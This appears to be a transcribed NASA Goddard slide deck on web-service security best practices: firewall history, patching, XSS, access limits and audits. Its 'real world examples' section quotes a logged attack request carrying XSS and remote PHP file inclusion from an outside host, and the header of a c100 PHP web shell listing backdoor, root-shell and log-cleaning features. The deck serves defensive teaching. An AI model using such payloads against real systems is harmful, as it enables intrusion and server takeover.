security:best practices. gsfc: what we have seen goddard “firewall” 1990's: very porous...
TRANSCRIPT
Security:Best Practices
GSFC: What we have seen
Goddard “Firewall”
1990's: Very Porous (Non-Existent), Default Allow
High Ports
1024-
65535
GSFC Servers
Restricted Ports
20
21
22
23
25
80
443
2000's: Much Tighter, Default Deny
22
25
80
Smaller attack surface,
increased attack attempts
Two Major Trends
1. Increase in web services offered: GCMD Web API's OGC Catalogue Services for Web (CSW) Other CEOS and GEOSS services
2. Increase in web based attacks: well known COTS or Open Source web vulnerabilities attacks on in-house code social engineering
The WGISS Community Dilemma
We have a responsibility to serve our users We have a responsibility to collaborate The web is the best current mechanism But the use of web services use may decrease our
security posture Solution:
proactive security awareness use of security best practices communicating threats and solutions in our community
COTS/Open Source Software Vulnerabilities
Real World Examples: The AttackSeen in Logs (Decoded):
83.217.66.50 - - [03/Sep/2007:05:56:51 -0400] "GET http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?
=<script>alert("xxx");</script> Hello Admin! Today%2
0You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include
("http://xyz.altervista.org/private2.txt?"); ?><ahref="<?php require ($files_dir.'/_custom_menu_link.php'); ?
>"><?php require($files_
dir.'/_custom_menu_name.php'); ?></<br><ahref="<?php require($files_dir.'/_custom_menu_name.php'); ?
>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<ahref="<?php
require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php
require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php
require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?=
>ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt?
HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows N
T 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT
Real World Examples: the Payload Payload at http://xyz.altervista.org/private2.txt:
<?php
/*******************************************************************************
* Locus7s Modified c100 Shell
* Beta v. 1.0a - Project x2300
* Written by #ophAcker team
* Modified by error & Be_gO
* Re-Modified by #error_maker (15.2.07)
*========================================================
* New Modifications Implemented --
* -Added link to Enumerate to escalate priviledges
* -Added Rootshell.c
* -Added Rootshell.c;auto-compiler
* -Execute Rootshell.c
* -Added Mig-Log Logcleaner
* -Execute Mig-Log Logcleaner
* -milw0rm searcher (Grabs OS and searches milw0rm)
* -Locus7s Style & Image
* -Added w4ck1ng Shell Backdoor Connect and Backdoor
* -Added PHP-Proxy link to hide you
* -Added your ip and server ip with whois capability
* -Added private 0day released by allahaka which utilizes the linux
* sudo bash to execute a stack overflow. (Continued)
Best Practices: COTS/OSS
Wisely choose COTS/OSS Web Applications what is the security record? is the software maintained?
Stay on top of software security patches schedule regular maintenance checks remotely audit for security vulnerabilities
Limit access does this application need to be open to the world? can authentication be used?
Review your Logs
In-House Web Application Software Vulnerabilities
Real World Example: Defacement Defacement
NASA: High value Soft target
Examples: HTML manipulation XSS SQL injection Element
manipulation
(example)
Source: apod.nasa.gov
<img src=”http://site/cgi/image-resizer.cgi?url=jpl.nasa.gov%2Fgalaxy.jpg”>
http://site/cgi/image-resizer.cgi?url=mysite.com%2Fnasacalc.jpg
“Astrology”
Real World Example: Defacement
Best Practices Defense:
Hash Table Flatfile or database Key = 123221 Value = “url=jpl.nasa.gov%2Fgalaxy.jpg” URL = http://site/cgi/image-resizer.cgi?url=123221
Encrypted Hash Function Algorithmic “jpl.nasa.gov%2Fgalaxy.jpg” -> hash function -> ADGCDDARG URL = http://site/cgi/image-resizer.cgi?url=ADGCDDARG
Cross Site Scripting (XSS) Example
Source: msdn2.microsoft.com
Cross Site Scripting Defences
Best Practices: Understand the types of XSS attacks
client side (i.e. javascript vulnerabilities) non-persistent (i.e. error messages) persistent (i.e. bulletin boards)
Validate user Input Utilize software security libraries Limit access
General Best Practices
Best Practice: Perform Regular
Security Audits Examples:
NMAP for network and service audits OS detection service version detection
NESSUS for security scans scans for all network vulnerabilities commercial support available
Nikto for specific web vulnerabilities over 3500 dangerous files/CGIs over 250 web server vulnerabilities
Intrusion Detection System Reporting
Best Practice: Limiting Access Incorporate Authentication Specify Allow/Deny Directives Utilise Firewall Rules Implement Rate limiting
Iptables (Linux) example:
-A SSH -m recent --set --name WEB
-A SSH -m recent --update --seconds 60 --hitcount 600 --rttl --name WEB -j DROP
-A SSH -j ACCEPT
Best Practice: Understand the
Software Apache: Compile your own
Loaded Modules in Default RedHat 5.1 httpd:
core_module (static) mpm_prefork_module (static) http_module (static) so_module
(static) auth_basic_module (shared) auth_digest_module (shared) authn_file_module
(shared) authn_alias_module (shared) authn_anon_module (shared) authn_dbm_module
(shared) authn_default_module (shared) authz_host_module (shared) authz_user_module
(shared) authz_owner_module (shared) authz_groupfile_module (shared) authz_dbm_module
(shared) authz_default_module (shared) ldap_module (shared) authnz_ldap_module (shared)
include_module (shared) log_config_module (shared) logio_module (shared) env_module (shared)
ext_filter_module (shared) mime_magic_module (shared) expires_module (shared) deflate_module
(shared) headers_module (shared) usertrack_module (shared) setenvif_module (shared) mime_module
(shared) dav_module (shared) status_module (shared) autoindex_module (shared) info_module
(shared) dav_fs_module (shared) vhost_alias_module (shared) negotiation_module (shared)
dir_module (shared) actions_module (shared) speling_module (shared) userdir_module (shared)
alias_module (shared) rewrite_module (shared) proxy_module (shared) proxy_balancer_module
(shared) proxy_ftp_module (shared) proxy_http_module (shared) proxy_connect_module (shared)
cache_module (shared) suexec_module (shared) disk_cache_module (shared) file_cache_module (shared)
mem_cache_module (shared) cgi_module (shared) version_module (shared) proxy_ajp_module (shared)
Manually Compiled server, with rewrite, alias, and proxy added :
core (static) mod_access (static) mod_auth (static) mod_include (static) mod_log_config
(static) mod_env (static) mod_setenvif (static) mod_proxy (static) proxy_connect (static)
proxy_ftp (static) proxy_http (static) prefork (static) http_core (static) mod_mime (static)
mod_status (static) mod_autoindex (static) mod_asis (static) mod_cgi (static) mod_negotiation
(static) mod_dir (static) mod_imap (static) mod_actions (static) mod_userdir (static) mod_alias
(static) mod_rewrite (static) mod_so (static)
Disadvantage: No RedHat RPM Updates
Best Practice: Understand the
Software (cont.)
OpenGIS® Catalogue Services Specification, Page 168
10.11.3.4 Delete action
The following XML Schema fragment defines a delete action:
<xsd:complexType name="DeleteType" id="DeleteType">
<xsd:sequence>
<xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/>
</xsd:sequence>
<xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/>
<xsd:attribute name="handle" type="xsd:ID" use="optional"/>
</xsd:complexType>
The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of
records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in
order to prevent every record in the catalogue from inadvertently being deleted.
The typeName attribute is used to specify the collection name from which records will be deleted.
The handle attribute is described in subclause 10.11.3.2.
Other Best Practices
Security in depth multiple mechanisms for limiting access multiple authentication mechanisms
Understand trust relationships with other projects with other agencies
Focus on data integrity Good, reliable, tested backups Prevent data misuse or misattribution Employ a knowledgeable, dependable staff
Conclusion
The scientific community depends on the quality and accuracy of the data
With the proliferation and interdependence of web services, the assurance that those services are accurate and secure becomes increasingly critical
The introduction of one security flaw into a web services based architecture could have a widespread, international impact